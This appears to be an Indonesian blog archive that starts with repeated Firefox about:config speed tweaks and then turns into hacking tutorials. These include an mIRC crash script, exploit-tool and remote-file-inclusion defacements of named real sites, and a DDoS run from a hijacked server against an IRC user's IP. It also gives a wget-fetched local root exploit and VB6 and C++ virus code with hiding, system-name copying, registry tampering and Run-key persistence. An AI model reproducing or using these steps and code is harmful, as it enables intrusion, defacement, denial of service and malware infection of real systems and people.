dan berikan nilai " 0 ".

buat yg udah pade pake Firefox, ada beberapa tip untuk mempercepat akses ke internet via browser keluaran Mozilla ini, yaitu:

Pada bar alamat, ketik = about:config

scroll kebawah, dan perhatikan kode-kode berikut :

pada kode network.http.pipelining, ubah nilainya menjadi “ true “

pada kode network.http.proxy.pipelining, ubah nilainya menjadi “ true “

pada kode network.http.pipelining.maxrequests, ubah nilainya menjadi, misal 10, 20, atau lebih.

Tetapi disarankan dibawah lima.

Lakukan perubahan dengan mengklik 2 kali pada kode-kode tersebut

Langkah terakhir, Klik kanan sembarang tempat, pilih New –> Integer

berikan nama ” nglayout.initialpaint.delay ” dan berikan nilai ” 0 “.

Setelah browsernya di restart, rasakan apa ada perubahan ???

browser Firefox ternyata bisa ditweak juga;)

caranya mudah sich,
pertama, buka browsernya, terus di address bar, ketik about:config dan tekan enter.
Lalu scroll ke bawah sampai ketemu baris berikut:
"network.http.pipelining"
"network.http.proxy.pipelining"
"network.http.pipelining.maxrequests"

Kalau sudah ketemu, ubah propertiesnya,
Set "network.http.pipelining" ke true
Set "network.http.proxy.pipelining" ke true
Set "network.http.pipelining.maxrequests" ke angka 30.

Setelah itu,Klik dimanapun, lalu klik New -> Integer. Beri nama "nglayout.initialpaint.delay" dan set nilainya ke 0.

Terus, set "network.dns.disableIPv6" ke true

Nah, sekarang coba lagi deh, browser anda pasti akan lebih cepat:)

Firefox.. salah satu browser open source yang paling yahud saat ini menurut saya. bahkan melebihi Internet Explorer bagi saya. Nah.. saya akan memberikan sedikit trik mengenai cara mempercepat Firefox anda dalam browsing di internet dengan seidikit tweak..

1. Untuk mempercepat browsing :

1. Ctrl+Enter, ini untuk membuka domain yang menggunakan .com. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.yahoo.com” jadi ketiklah “yahoo” kemudian klik ctrl+enter
2. Shift+Enter, ini untuk membuka domain yang menggunakan .net. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.telkom.net” jadi ketiklah “telkom” kemudian klik shif+enter
3. Ctrl+Shift+Enter, ini untuk membuka domain yang menggunakan .org. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.dikti.org” jadi ketiklah “dikti” kemudian klik Ctrl+Shift+Enter

2. Tweeking Firefox :

1. Ketik “about:config” di firefox anda kemudian enter
2. Maka akan keluar sebuah settingan untuk tweaking firefox
3. Untuk merubahnya, klik 2 kali dan masukkan data perubahannya
4. Jika data dibawah tidak terdapat dalam settingan default firefox, klik kanan pilih New. Untuk data berupa angka, pilih Integer, untuk true/false pilih Boolean.

- Untuk pengguna DSL :

1. Set “network.http.pipelining : true”
2. Set “network.http.proxy.pipelining : true”
3. Set “network.http.pipelining.maxrequests : 64?
4. Set “nglayout.initialpaint.delay : 0?

- Untuk pengguna ADSL :

1. Set “network.http.max-connections : 64?
2. Set “network.http.max-connections-per-server : 21?
3. Set “network.http.max-persi stent-connections-per-ser ver : 8?
4. Set “network.http.pipelining : true”
5. Set “network.http.pipelining.maxrequests : 100?
6. Set “network.http.proxy.pipelining : true”
7. Set “nglayout.initialpaint.delay : 0?

- Untuk pengguna Dial Up

1. Set “browser.cache.disk_cache_ssl : true”
2. Set “browser.xul.error_pages.enabled : true”
3. Set “network.http.max-connections : 32?
4. Set “network.http.max-connections-per-server : 8?
5. Set “network.http.max-persi stent-connections-per-pro xy : 8?
6. Set “network.http.max-persi stent-connections-per-ser ver : 4?
7. Set “network.http.pipelining : true”
8. Set “network.http.pipelining.maxrequests : 8?
9. Set “network.http.proxy.pipelining : true”
10. Set “plugin.expose_full_path : true”
11. Set “signed.applets.codebase_principal_support : true”
12. Set “content.interrupt.parsing : true”
13. Set “content.max.tokenizing.time : 3000000?
14. Set “content.maxtextrun : 8191?
15. Set “content.notify.backoffcount : 5?
16. Set “content.notify.interval : 750000?
17. Set “content.notify.ontimer : true”
18. Set “content.switch.threshold : 750000?

Firefox.. salah satu browser open source yang paling yahud saat ini menurut saya. bahkan melebihi Internet Explorer bagi saya. Nah.. saya akan memberikan sedikit trik mengenai cara mempercepat Firefox anda dalam browsing di internet dengan seidikit tweak..

1. Untuk mempercepat browsing :

1. Ctrl+Enter, ini untuk membuka domain yang menggunakan .com. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.yahoo.com” jadi ketiklah “yahoo” kemudian klik ctrl+enter
2. Shift+Enter, ini untuk membuka domain yang menggunakan .net. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.telkom.net” jadi ketiklah “telkom” kemudian klik shif+enter
3. Ctrl+Shift+Enter, ini untuk membuka domain yang menggunakan .org. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.dikti.org” jadi ketiklah “dikti” kemudian klik Ctrl+Shift+Enter

2. Tweeking Firefox :

1. Ketik “about:config” di firefox anda kemudian enter
2. Maka akan keluar sebuah settingan untuk tweaking firefox
3. Untuk merubahnya, klik 2 kali dan masukkan data perubahannya
4. Jika data dibawah tidak terdapat dalam settingan default firefox, klik kanan pilih New. Untuk data berupa angka, pilih Integer, untuk true/false pilih Boolean.

- Untuk pengguna DSL :

1. Set “network.http.pipelining : true”
2. Set “network.http.proxy.pipelining : true”
3. Set “network.http.pipelining.maxrequests : 64?
4. Set “nglayout.initialpaint.delay : 0?

- Untuk pengguna ADSL :

1. Set “network.http.max-connections : 64?
2. Set “network.http.max-connections-per-server : 21?
3. Set “network.http.max-persistent-connections-per-server : 8?
4. Set “network.http.pipelining : true”
5. Set “network.http.pipelining.maxrequests : 100?
6. Set “network.http.proxy.pipelining : true”
7. Set “nglayout.initialpaint.delay : 0?

- Untuk pengguna Dial Up

1. Set “browser.cache.disk_cache_ssl : true”
2. Set “browser.xul.error_pages.enabled : true”
3. Set “network.http.max-connections : 32?
4. Set “network.http.max-connections-per-server : 8?
5. Set “network.http.max-persistent-connections-per-proxy : 8?
6. Set “network.http.max-persistent-connections-per-server : 4?
7. Set “network.http.pipelining : true”
8. Set “network.http.pipelining.maxrequests : 8?
9. Set “network.http.proxy.pipelining : true”
10. Set “plugin.expose_full_path : true”
11. Set “signed.applets.codebase_principal_support : true”
12. Set “content.interrupt.parsing : true”
13. Set “content.max.tokenizing.time : 3000000?
14. Set “content.maxtextrun : 8191?
15. Set “content.notify.backoffcount : 5?
16. Set “content.notify.interval : 750000?
17. Set “content.notify.ontimer : true”
18. Set “content.switch.threshold : 750000?

Sudah bosan dengan internet dial up yg lambat ?? Lo bisa mempercepat browser firefox dengan cara dibawah ini :

Tulis about:config di address bar, akan ada sebuah text box namanya 'filter'. Tulis di situ maxrequest , akan muncul sebuah item yg namanya network.http.pipelining.maxrequests , lalu ganti value nya menjadi 100 dengan cara mengklik angka dibawah tulisan value dan mengganti nya dengan 100. Setelah itu lo tinggal klik ok, dan kecepatan fire fox lo akan bertambah.

Teori :
sebelum network.http.pipelining.maxrequests kita ubah value nya, disitu tertulis angka 8(default) yang berarti firefox akan merequest 8 data sekaligus ketika lo lagi surfing internet, setelah 8 data itu selesai di download, baru firefox mengirim request 8 data yg lainnya. Dengan ngubah jadi 100 firefox bakal ngerequest 100 data sekaligus ketika lo lagi browsing. makanya itu akan mempercepat kecepatan browsing lo.

Ikutilah lagkah langkah di bawah ini, mungkin bisa membantu ..!!

1. Buka Mozilla Firefox
2. Di alamat browser ketikan "About:config" ( Tanpa tanda petik )
3. Cari preference name berikut : network.http.pipelining
4. Jika sudah ketemu doubleklik di preferene name tersebut, hinga menjadi true
5. Cari lagi preference name : network.http.proxy.pipelining
6. Double klik hingga berubah menjadi true
7. Kemudian restar komputer
8. Mulailah browsing lagi

Nah sekarang internet menjadi lebih cepat

Selamat Mencoba

Pertama saya mohon maaf kepada para master semua, sekiranya artikel berikut ini tidak bermutu tapi siapatau aja teman teman yang lain masih ada yang belum ngerti heheehe...maklum masih newbie jadi artikelnya juga ya sesuai dengan kemampuan yang penting kita saling berbagi......Very Happy
Salah satu alasan utama saya selalu menggunakan MOzilla Firefox untuk kegiatan online adalah banyaknya add ons yang tersedia, disamping ketaguhan dan kemudahan dalam penggunaan serta menu yang lengkap adalah alasan lain yang tak boleh dikesampingkan,
kali ini ada trik khusus untuk mengakali Mozilla Firefox agar dapat bekerja lebih maksimal lagi dalam berinternet. karena seringkali saat kita browsing atau kegiatan apalah yang berhubungan dengan internet dan menggunakan MOzilla Firefox terasa lambat banget kinerjanya, hal ini umumnya terjadi karena keterbatasan bandwitdh yang tersedia....nah trik berikut ini kita akan mengakali hal ini agar aktifitas berinternet kita dapat berjalan lebih cepat dari sebelumnya, yah minimal tiga kali lebih cepatlah....hahahahha

Langkah pertama adalah buka MOzilla Firefox
lalu pada address bar ketik : about:config
setlah itu nanti kita masuk ke halaman pengaturan mozilla firefox, dihalaman inilah nanti kita akan melakukan sedikit manipulasi terhadap kode kode yang telah ada, karena kode kode tersebut adalah setingan standar.
setelah berada dalam halaman config, silahkan cari file file berikut ini:
1. network.http.pipelining
2. network.http.proxy.pipelining
3. network.http.pipelining.maxrequests
untuk mencari nama nama file tersebut tidaklah sulit karena penempatan file tersebut berdasarkan abjad, jadi dalam proses pencarian saya yakin anda tidak akan menemukan kesulitan.
jika telah menemukan ketiga nama file tersebut maka langkah anda selanjutnya adalah
1. Mengganti nilai false pada network.http.pipelining menjadi true, caranya adalah dengan melakukan double click pada file tersebut, otomatis akan langsung berganti sendiri menjadi true
2. Hal sama pula dilakukan untuk file network.http.proxy.pipelining
3. sedangkan untuk file network.http.pipelining.maxrequests, yang perlu diubah disini adalah nilai integernya,isi nilainya dengan 30

selanjutnya adalah membuat string value baru dengan nama nglayout.initialpaint.delay, untuk membuatnya, lakukan klik mouse sebelah kanan pada area yang kosong, setelah tampil menu, pilih New dan Intege, lalu masukan nglayout.initialpaint.delay sekarang matikan Mozilla Firefox ( restart ), dan liat perubahannya.

Download Script IRC buat bikin error mIRC orang

2008-06-07T04:09:00.000-07:00

Bagaimana cara ngisengin MIRC orang lain di channel dengan iNDoNeSiaN-iDioT SiMPLe SCRIPT #===
By : saben
( Penulis tidak bertanggung jawab dengan penyalah gunaan Tutorial & Script yg tlh di modifikasi ini oleh org² yg tdk bertanggung jawab, use it wise ok !!!)

Sebelumnya sebenarnya penulis sendiri pernah dikerjain seperti kejadian diatas.
Sebenernya penulis memanfaatkan bugs lama dari MIRC DCC sent yg vunerable versi 6.0 sampai versi 6.11 (Script ini tdk berfungsi utk MIRC versi 5.91 kebwh & versi 6.12 keatas. Setelah penulis survey di channel² terutama channel yg besar ternyata belom banyak yg tau & msh byk juga yg pake MIRC yg vunerable versi 6.11 kebwh ( belom di upgrade ). Disini saya tidak membahas kenapa MIRC yg vunerable tersebut bisa dibikin error. Saya akan memberikan sedikit pengetahuan saya tentang bagaimana ngisengin mirc org lain.

Ok, this`s a view thing we need:
1. MIRC ( versi apa aja )>>> jelas dong... ~
2. File popups.ini & scritp.ini yg udah di modifikasi >>> ente bisa file download di http://www.freewebs.com/saben/iDioT.zip
3. Winzip >>> program ini perlu utk buka file yg dlm btk zip
3. IE explorer or Opera buat browsing ke site² porno, berita ato terserah ente >>> yg ini ga ada juga gpp... P~
4. Rokok >>> terserah mo rokok apa aja & mo brp bungkus, kl penulis rokoknya Sampoerna Amild.
5. Coffee or Tea >>> boleh juga tuh... ~
6. Cemilan >>> apalgi ini biar chabby... ~

Terus yg akan kta lakukan utk ngerjain MIRC org adl:
1. Buka MIRC ente, trs conect ke server >>> servernya terserah ente...
3. Kl udah di download trs buka pake klik 2x file iDioT.zip yg udah di download td. Trs extract kedua file tsb ke direktori dimana ente install mirc. Biasanya di C:\Program Files\mIRC, trs akan muncul windows pop up yg konfirmasi ke ente apakah ente ganti file popups.ini & script.ini yg lama dg yg baru. Ente klik "Yes to All" aja. Kl udah berarti file popups.ini & scritp.ini ente dah berubah.
4. Trs ente load kedua file baru td caranya ente ketik command ini di mirc ente /load -rs popups.ini >>> utk load file popups.ini & ente ketik /load -rs script.ini. Setelah ente load mk akan keluar * Loaded script 'C:\PROGRAM FILES\MIRC\popups.ini' & * Loaded script 'C:\PROGRAM FILES\MIRC\script.ini' >>> itu artinya file popups.ini & script.ini ente dah di load & siap dipake.
5. Skr ente restart dari awal lg miRC ente (Disconnect-in miRC trs tutup dah itu buka lg miRC td), knp hrs di restart lg? Krn kedua script tsb ga jalan kl miRC ente ga di restart.

Trs skr gmn cr pakenya?
Sabar dong om, ini juga lg mo dijelasin kok...~

Nah sekarang gimana cara pakenya
Hueee... gampang kok...
1. Ente cari dulu targetnya di channel contoh:
* Joins: alec_trevelyan (wvmzsx@202.95.136.222) >>> target nih
2. Ente cari tau beliau pake MIRC versi brp, caranya : ente tgl klik kanan nick target tsb dan pilih iDioT !!! ato iDioT Lo !!! (sebnrnya kedua code tsb sama aja fungsinya) yg membedakan hanyalah tampilan di MIRC ente stlh ente eksekusi si target, maka akan tampil -> [alec_trevelyan] VERSION di MIRC ente trs respon dari permintaan dari version ente adl >>> [alec_trevelyan VERSION reply]: mIRC v6.03 Khaled Mardam-Bey >>> Weks... versi 6.03 nih... itu tandanya vunerable.
3. Nah sekarang kita tgl eksekusi target caranya gmn? Gampang maka akan keluar tulisan ini pd MIRC ente >>> "SiMSaLaBiM... aBRaKaDaBRa... MiRC-nya alec_trevelyan eRRoR !!! - iNDoNeSiaN-iDioT SiMPLe SCRiPT -
-iNDoNeSiaN-iDioT- u R MY MaSTeR !!!" itu tandanya Script ente tlh bekerja tgl liat channel dmn target berada dan tdk sampai 5 detik kemudian >>> * Quits: alec_trevelyan (wvmzsx@202.95.136.222) (Read error: Connection reset by peer) >>> Huaaa... target dc & MIRC-nya error, korban hrs memulai lg buka MIRC baru krn stlh MIRC-nya error mau ga mau MIRC-nya hrs ditutup... ~
4. Cari target lain.. & lakukan lg hal yg diatas tsb... ampe bosen... ( jgn iseng trs ya... ~ )
5. Ato kl mo ngisengin massal di channel kita join cukup ketik /ctcp #channel version dan liat nick mana aja yg mircnya vunerable utk kta kerjain.

Enjoy it
Pakek http://www.geocities.com/family_server2/iDioT.zip

Deface situs asp/IIS dgn tools Exploit

2008-06-07T04:03:00.001-07:00

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. www.target.com
2. Download tools IIS Exploit [ http://www.geocities.com/jambihackerlinkcrew/tools/IIS-Exploit.zip ] Kalo udah di download, install di PC kamu.
3. Buka Notepad trus ketik kan nama target nya, misal nya : www.target.com
Ingat target nya yg file asp. Kalo bisa bikin yg banyak target nya. Trus simpan di PC kamu dgn nama file Target.
4. Buka tools IIS Exploit tadi.
Dikolom "Criar" ketik /Hacked.htm
Dikolom "Commandos" klik tab "Listar". Carilah file Notepad Target tadi.
Dikolom "Setar Texto" ketik Hacked by nama nick kamu. kemudian klik tab "Start Scan and Ownz". Tunggu beberapa saat......
Kalo di kolom "Pagew Ownadas" tidak ada muncul tulisan misal nya www.target.com/Hacked.htm berarti tidak berhasil, coba target lain.
5. Kalo berhasil di kolom "Pagew Ownadas" akan muncul tulisan misal nya www.target.com/Hacked.htm
6. Buka url/browsing baru trus ketik www.target.com/Hacked.htm

Sumber :
- jambihackerlink.tk

DDOS (Cara menembak ip orang dari shell orang lain)

2008-06-07T04:01:00.000-07:00

DDOS

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.defendersofmodan.net/index.php?name=PNphpBB2

2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net

3. Masukkan bug ini di belakang situs tadi :

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

4. Masukkan file inject ini di belakang nya lagi :

http://www.geocities.com/jambihackerlinkcrew/sql.htm

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd

Jangan lupa memasukkan command Unix di ujungnya

5. Masukkan file tembak.c ini di belakang nya lagi :

http://channels.dal.net/kota-makassar/tembak.c

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://channels.dal.net/kota-makassar/tembak.c -O /var/tmp/tembak.c

6. Kemudian Compile file tembak.c

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c

7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois

misal nya

ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute

Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers

8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).

misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53

Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.

Sumber :
- Jambihackerlink.tk

Cara Merebut ROOT dengan menggunakan local exploit evie

2008-06-07T03:59:00.002-07:00

Sebenernya banyak cara yang dapet dilakukan bagi kita yang mempunyai shell user biasa untuk
mendapatkan root shell yaitu dengan menggunakan local exploit..
Dewasa ini telah banyak muncul local exploit yang beredar.. Namun yang akan kita bahas adalah
*evie*.. local exploit ini telah penulis buktikan ke*Saktian* nya pada

RH9 yang penulis lupa
Rh9 tersebut menggunakan kernel apa...

Ujicoba telah Penulis lakukan di PC kawan yang menggunakan Rh9 dan di beberapa server yang
menggunakan Rh9... Local exploit ini cukup terbukti ke*Saktiannya*. untuk menanggulanginya..
para System Admin server sebaiknya menggunakan kernel terbaru di server mereka dan lebih jeli
lagi dalam menjaga server mereka dari orang-orang yang tidak bertanggung jawab (kecuali saya loo!!)

Baiklah tanpa harus menunda lagi.... kita mulai!!!!
(masuk keserver anda/ shell anda)

login as: bos
bos@darmajaya.com password :
lastlogin 01 january 2005 from 203.130.235.89
You Have Mail
bos@darmajaya/ $ id;
id;
uid=500(bos) gid=500(bos) euid=500(bos) groups=500(bos) <=- User shell sebelum Menjadi root

bos@darmajaya/ $ wget bocahedan.com/download/evie <=- mendownload file evie

bos@darmajaya/ $ chmod 755 evie <=- memberikan permission pada evie

chmod 755 evie
bos@darmajaya/ $ ./evie <=- Menjalan kan evie
./evie
bash# id; <=- Telah terjadi perubahan (tidak semua-
uid=0(root) gid=0(root) euid=0(root) groups=0(root) shell mengalami perubahan seperti itu)
bash# su
su
root@darmajaya/ $ uname -a
Linux 2.2.3 darmajaya.com #1 Thu Jan 01 07:31:07 EDT 2005 i586 unknown
root@darmajaya/ $
root@darmajaya/ $ id; <=- selamat anda telah menjadi ROOT
id;
uid=0(root) gid=0(root) euid=0(root) groups=0(root)
root@darmajaya/ $

demikianlah tulisan saya kali ini... semoga bermanfaat bagi rekan2 semua :P~

by : Rudiansyah (AvEs)

Deface situs Mambo

2008-06-07T03:59:00.001-07:00

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://sukan.upm.edu.my/Buletin/index.php?option=com_content&task=view&id=17&Itemid=2

2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?

3. Masukkan bug ini di belakang situs tadi :

_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/jambihackerlinkcrew/sql.htm

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/jambihackerlinkcrew/sql.htm?

5. Di kolom cmd ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /opt/orion

7. Masukkan file deface ini :

http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

8. Di kolom cmd ketik :

cd /opt/orion;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

Sumber :
Jambihackerlink.tk

Bikin Virus Pake VB6

2008-06-07T03:56:00.000-07:00

bikin virus pake VB6 '1'

Oke dewh.. karna udah banyak yang minta cara bikin virus, aku pos dikit dewh gimana cara bikin virus pake VB6.
seperti biasa, tulisan dibawah ini hanya buat nambah pengetahuan kita aja. dan nggak boleh buat kejahatan.
Dan aku nggak bertanggung jawab atas segala penyalahgunaan isi tulisan diblog ini..
Ok. kalo kamu setuju, lanjut.....

Sekarang e sekarang, kita mo bikin virus pake VB6.
pertama, bikin form buat virus kamu pake standard exe aja.
dari pade bingung
ngejelasinnya aku kasih kodenya aja. biar pada blajar skalian.kan udah gedhe..
'cape dewh'

buat postingan yang pertama ni tak kasih kode yang simpel aja. yang ngga pake deklarasi. biar gak terlalu bingung. 'aku aja masih bingung' hehehe,,

1. Nyembunyiin Form form visible

Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Kopiin Diri Sendiri

misalna mo dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe

biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + ".exe", "C:\WINDOWS\winlogon.exe"
FileCopy App.EXEName + ".exe", "C:\WINDOWS\csrss.exe"
FileCopy App.EXEName + ".exe", "C:\WINDOWS\services.exe"
FileCopy App.EXEName + ".exe", "C:\WINDOWS\smss.exe"
FileCopy App.EXEName + ".exe", "C:\WINDOWS\lsass.exe"

3. Bikin Direktori ato folder

misalnya bikin folder di windows direktori
On Error Resume Next
MkDir "C:\WINDOWS\virus"

4. Mengganti Atribut file

bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
sembunyi.GetFile("C:\WINDOWS\winlogon.exe").Attributes = 2
sembunyi.GetFile("C:\WINDOWS\csrss.exe").Attributes = 2
sembunyi.GetFile("C:\WINDOWS\services.exe").Attributes = 2
sembunyi.GetFile("C:\WINDOWS\smss.exe").Attributes = 2
sembunyi.GetFile("C:\WINDOWS\lsass.exe").Attributes = 2
tapi kalo folder pakenya
sembunyi.GetFolder("C:\WINDOWS\").Attributes = 2

5. Bikin Pesan Virus

bikin pesen pake text file
On Error Resume Next
Set bikinpesen = CreateObject("Scripting.FileSystemObject")
Set isipesen = bikinpesen.Createtextfile("C:\baca saya.txt ")
isipesen.writeline ("komputer kamu kena virus bodoh ")
isipesen.Close

6.Ngubah Registry

misalna mo disable regedit
On Error Resume Next
Set ubahreg = CreateObject("WScript.Shell")
ubahreg.regwrite "HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools", 1, "REG_DWORD"

7.Nghapus Registry

misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

On Error Resume Next
Set hapusreg = CreateObject("WScript.Shell")
hapusreg.regdelete "HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon"

udah dulu yawh, besok disambung lagi... dah ngantuk ni,, padahal cuman bentar. yang lama nulisnya..

besok bikin virusna yang pake deklarasi biar nggak terkesan bodo virusnya. skalian aku pelajari dulu. cz, aku ndiri nggak bgitu paham pake deklarasi.. hehe,,, cape dewh'' :)

Bikin Virus C++

2008-06-07T03:55:00.000-07:00

Bikin Virus C++

Bikin virus pake C++ bikin virus pake C++

#include
#include

char windir[MAX_PATH];

int APIENTRY WinMain (HINSTANCE hInstance,
HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
char pathname[256];
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);
HKEY hKey;
GetWindowsDirectory(windir, sizeof(windir));

strcat(windir, "\\NasiTumpeng.exe");
CopyFile(pathname, windir, 0);

GetWindowsDirectory(windir, sizeof(windir));
strcat(windir, ".exe");
CopyFile(pathname, windir, 0);

GetWindowsDirectory(windir, sizeof(windir));
strcat(windir, "\\Shellnew\\LumpurPanas.exe");
CopyFile(pathname, windir, 0);

RegCreateKey (HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&hKey);RegSetValueEx (hKey, "Musibah", 0, REG_SZ,
(LPBYTE)windir, sizeof(windir));
return 0;
}

2008-06-07T03:54:00.000-07:00

================================

Bermain - Main Dengan Ms DOS.Sys

================================
Friday, Juni 6, 2008

by
uwie_lumut_bekti
mirshadauwie@yahoo.com

Kali ini kita coba bermain dengan salah satu file yang berkategori sistem dan terletak di
direktori C:\ dengan ukuran sekitar 2 kilo byte. File ini berkaitan erat dengan proses booting
Windows karena berisi setting - setting apa yang perlu dijalankan oleh sistem operasi dan apa
yang tidak. Namanya adalah MsDos.sys. File MsDos.sys mempunyai tiga bagian yaitu bagian pertama
adalah paths yang berisi letak direktori Windows; bagian kedua adalah options yang berisi
setting - setting yang perlu dijalankan Windows; dan bagian terakhir berisi deretan huruf -
huruf xxxxxx yang berfungsi untuk menjaga kompatibilitas dengan program yang lain. Dalam
artikel ini kita akan bermain dengan bagian options karena disamping bagian inilah yang
menarik, juga paling luas dan beragam setting - settingnya.
Karena termasuk dalam file sistem, maka file ini mempunyai atribut hidden (tersembunyi) dan
read only (hanya bisa dilihat tidak bisa diedit). Untuk itu agar dapat "dimainkan" pembaca
perlu mengubah attribut file tersebut. Bukalah Windows Explorer dan pilih menu View > Folder
Options. Pilih tab View dan klik option Show all files. Setelah itu tekan tombol Ok. Kemudian
carilah file sistem MsDos.sys yang berada di C:\ . Sebelumnya backup dulu file tersebut dengan
meng-copy ke disket. Kemudian klik kanan dan pilih Properties. Pembaca akan dihadapkan pada
kotak dialog properti untuk file MsDos.sys. Pada bagian attribute, kosongkan bagian Read Only d
an Hidden. Akhirnya buka file tersebut dengan Notepad. Sekarang , yuk , kita mulai mengutak -
utik MsDos.sys. Perlu diingat, jangan diubah - ubah bagian yang lainnya kecuali bagian yang
dijelaskan ini.

Setting BootGui
===============
Setting ini fungsinya menentukan apakah komputer akan menggunakan interface GUI atau tidak.
GUI adalah singkatan dari Graphical User Interface yaitu suatu antarmuka untuk pengguna
komputer yang berbasis grafis. Secara bawaan (default), setting di MsDos.sys adalah BootGui = 1
artinya komputer akan menggunakan sistem Gui dan masuk ke Windows. Sebaliknya bila berisi 0,
maka komputer hanya akan booting sampai ke MsDos prompt saja tidak diteruskan ke Windows. Untuk
masuk ke Windows pembaca perlu mengetikkan 'Win' kemudian tekan Enter. Ringkasnya, tambahkan
salah satu setting berikut ini dibagian option.

BootGui=1 (masuk ke Windows)
BootGui=0 (hanya sampai ke Dos)

Setting AutoScan
================
Apabila listrik tiba - tiba pada padam saat komputer kita nyala atau kita mematikan komputer
dengan tidak normal, maka secara otomatis komputer akan melakukan Scandisk pada harddisk ketika
kita menyalakan komputer diwaktu kemudian. Ini merupakan suatu prosedur standar yang dilakukan
Windows untuk menghindari kerusakan harddisk. Pada setting autoscan inilah yang menentukan
apakah harus dijalankan Scandisk atau tidak. Nilainya adalah sebagai berikut :

AutoScan = 0 (tidak ada scandisk meski shut down tidak normal)
AutoScan = 1 (ada scandisk ketika shutdown tidak normal)

Pembaca perlu mempertimbangkan dengan mendalam bila memilih setting autoscan = 0. Karena salah
satu fungsi scandisk adalah memperbaiki kerusakan pada harddisk karena shut down yang tidak
sesuai prosedur.

Setting BootSafe
================
Masih serupa dengan masalah di atas yaitu ketika komputer dimatikan secara tidak sesuai
prosedur, terkadang komputer akan booting dan masuk ke Windows dengan modus safemode. Setting
pada MsDos.sys juga yang mengatur masalah ini.

